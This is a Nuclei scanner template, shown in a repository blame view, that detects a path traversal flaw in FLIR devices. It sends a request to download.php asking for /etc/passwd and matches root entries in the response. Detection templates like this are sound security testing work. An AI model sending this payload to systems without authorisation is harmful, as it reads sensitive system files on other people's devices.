nuclei-templates/vulnerabilities/other/flir-path-traversal.yaml

26 lines
439 B
YAML
Raw Normal View History

2021-05-16 04:54:40 +00:00
id: flir-path-traversal
info:
name: Flir Path Traversal
author: pikpikcu
severity: high
reference: https://juejin.cn/post/6961370156484263972
tags: flir,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-05-16 04:54:40 +00:00
condition: and
- type: status
status:
- 200